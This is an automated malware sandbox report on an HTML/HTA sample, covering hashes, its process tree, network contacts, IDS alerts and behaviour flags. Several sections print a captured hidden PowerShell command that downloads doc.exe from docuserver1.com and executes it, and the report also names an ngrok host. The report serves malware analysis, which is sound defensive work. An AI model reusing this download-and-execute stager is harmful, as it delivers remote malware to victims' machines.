Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	June 24, 2021, 7:45 p.m.	June 24, 2021, 8:06 p.m.

Size	538.0B
Type	HTML document, ASCII text, with CRLF line terminators
MD5	`5562d4b0b0707245170b795a79422da3`
SHA256	`dafcd9bc5e53c080eb9d4054c4b5cb802a2a218068448613b1487cc63c6da031`
CRC32	`FB0AEB71`
ssdeep	`12:c6QclfhTD5LWy0cqSPsnWRcYnf37kYtzNk6ULWzB7BYMSe7k:csphCdcq96frkYcpE1YMdg`
Yara	Antivirus - Contains references to security software

iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\word.hta.html
4356
- iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:4356 CREDAT:145409
  9076
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://docuserver1.com/d/doc.exe',$env:Temp+'\EJNFTE.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\EJNFTE.Exe')
    4024
    - EJNFTE.Exe "C:\Users\test22\AppData\Local\Temp\EJNFTE.Exe"
      2508
      - EJNFTE.Exe "C:\Users\test22\AppData\Local\Temp\EJNFTE.Exe"
        8248

Name	Response	Post-Analysis Lookup
docuserver1.com	A 66.45.232.203	66.45.232.203
0.tcp.ngrok.io	A 3.14.182.203	3.22.30.40

IP Address	Status	Action
164.124.101.2	Active	Moloch
172.217.25.14	Active	Moloch
3.14.182.203	Active	Moloch
66.45.232.203	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.102:61459 -> 164.124.101.2:53	2022642	ET POLICY DNS Query to a *.ngrok domain (ngrok.io)	Potential Corporate Privacy Violation
TCP 192.168.56.102:49825 -> 66.45.232.203:80	2008350	ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile	Potential Corporate Privacy Violation
TCP 192.168.56.102:49823 -> 66.45.232.203:80	2008350	ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile	Potential Corporate Privacy Violation
TCP 192.168.56.102:49813 -> 66.45.232.203:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.102:49829 -> 66.45.232.203:80	2008350	ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile	Potential Corporate Privacy Violation
TCP 192.168.56.102:49821 -> 66.45.232.203:80	2008350	ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile	Potential Corporate Privacy Violation
TCP 66.45.232.203:80 -> 192.168.56.102:49813	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 66.45.232.203:80 -> 192.168.56.102:49813	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.102:49827 -> 66.45.232.203:80	2008350	ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile	Potential Corporate Privacy Violation

Suricata TLS

No Suricata TLS

Queries for the computername (9 events)

Time & API	Arguments	Status	Return
GetComputerNameW June 24, 2021, 7:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 24, 2021, 7:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 24, 2021, 7:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 24, 2021, 7:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 24, 2021, 7:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 24, 2021, 7:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 24, 2021, 7:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 24, 2021, 7:42 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 24, 2021, 7:42 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent June 24, 2021, 7:41 p.m.			0	0
IsDebuggerPresent June 24, 2021, 7:42 p.m.			0	0

Uses Windows APIs to generate a cryptographic key (40 events)

Time & API	Arguments	Status	Return
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000214b60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000291ab0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000291ab0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000291ab0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b81bc00 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b81bc00 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b81bb90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b81bb90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b81bb90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b81bb90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b81c1b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b81c1b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b81c1b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b81bf80 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b81bf80 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b81bf80 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b81c610 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b81c610 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b81c610 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b81c610 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b81c610 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b81c610 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b81c610 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b81c610 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b81c680 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b81c680 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b81c680 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b81c680 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b81c680 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b81bf80 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b81bf80 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b81c680 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b81c680 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b81c680 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001f66e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001f66e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001f62f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001f62f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b83f640 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b83f640 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 24, 2021, 7:41 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header

suspicious_request

GET http://docuserver1.com/d/doc.exe

Performs some HTTP requests (2 events)

request	GET http://docuserver1.com/d/doc.exe
request	GET http://docuserver1.com/ng.txt

Allocates read-write-execute memory (usually to unpack itself) (50 out of 304 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory June 24, 2021, 7:41 p.m.	process_identifier: 4356 region_size: 13635584 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002a70000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2021, 7:41 p.m.	process_identifier: 4356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000003770000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:41 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:41 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:41 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:41 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:41 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:41 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:41 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000770dd000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:41 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077102000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:41 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000770e4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:41 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077102000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:41 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc135000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:41 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc135000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:41 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdda4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:41 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefda01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:41 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000770ca000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2021, 7:41 p.m.	process_identifier: 4356 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002eb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:41 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000735bc000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:42 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000003770000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:42 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:42 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:42 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:42 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:42 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:42 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:42 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000770dd000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:42 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077102000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:42 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000770e4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:42 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077102000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:42 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc135000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:42 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdda4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:42 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefda01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:42 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000770ca000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:42 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077102000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:42 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:42 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:42 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:42 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:42 p.m.	process_identifier: 4356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2021, 7:41 p.m.	process_identifier: 9076 region_size: 13438976 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002460000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2021, 7:41 p.m.	process_identifier: 9076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000003130000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:41 p.m.	process_identifier: 9076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:41 p.m.	process_identifier: 9076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:41 p.m.	process_identifier: 9076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:41 p.m.	process_identifier: 9076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:41 p.m.	process_identifier: 9076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:41 p.m.	process_identifier: 9076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:41 p.m.	process_identifier: 9076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000770dd000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:41 p.m.	process_identifier: 9076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077102000 process_handle: 0xffffffffffffffff	1

Checks whether any human activity is being performed by constantly checking whether the foreground window changed

Creates executable files on the filesystem (3 events)

file	C:\Users\test22\AppData\Roaming\Temp\word.exe
file	C:\Users\test22\AppData\Local\Temp\EJNFTE.Exe
file	C:\Users\test22\AppData\Local\Temp\nsfEC2B.tmp\System.dll

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://docuserver1.com/d/doc.exe',$env:Temp+'\EJNFTE.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\EJNFTE.Exe')
cmdline	powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://docuserver1.com/d/doc.exe',$env:Temp+'\EJNFTE.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\EJNFTE.Exe')

Drops an executable to the user AppData folder (2 events)

file	C:\Users\test22\AppData\Local\Temp\nsfEC2B.tmp\System.dll
file	C:\Users\test22\AppData\Roaming\Temp\word.exe

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW June 24, 2021, 7:41 p.m.	show_type: 0 filepath_r: powershell.exe parameters: -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://docuserver1.com/d/doc.exe',$env:Temp+'\EJNFTE.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\EJNFTE.Exe') filepath: powershell.exe	1	1	0

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (4 events)

Time & API	Arguments	Status	Return
Process32NextW June 24, 2021, 7:42 p.m.	snapshot_handle: 0x00000180 process_name: taskhost.exe process_identifier: 1816	1	1
Process32NextW June 24, 2021, 7:42 p.m.	snapshot_handle: 0x00000180 process_name: iexplore.exe process_identifier: 9076	1	1
Process32NextW June 24, 2021, 7:42 p.m.	snapshot_handle: 0x00000180 process_name: EJNFTE.Exe process_identifier: 2508	1	1
Process32NextW June 24, 2021, 7:42 p.m.	snapshot_handle: 0x000002d0 process_name: EJNFTE.Exe process_identifier: 8248	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses June 24, 2021, 7:41 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (1 event)

Data received

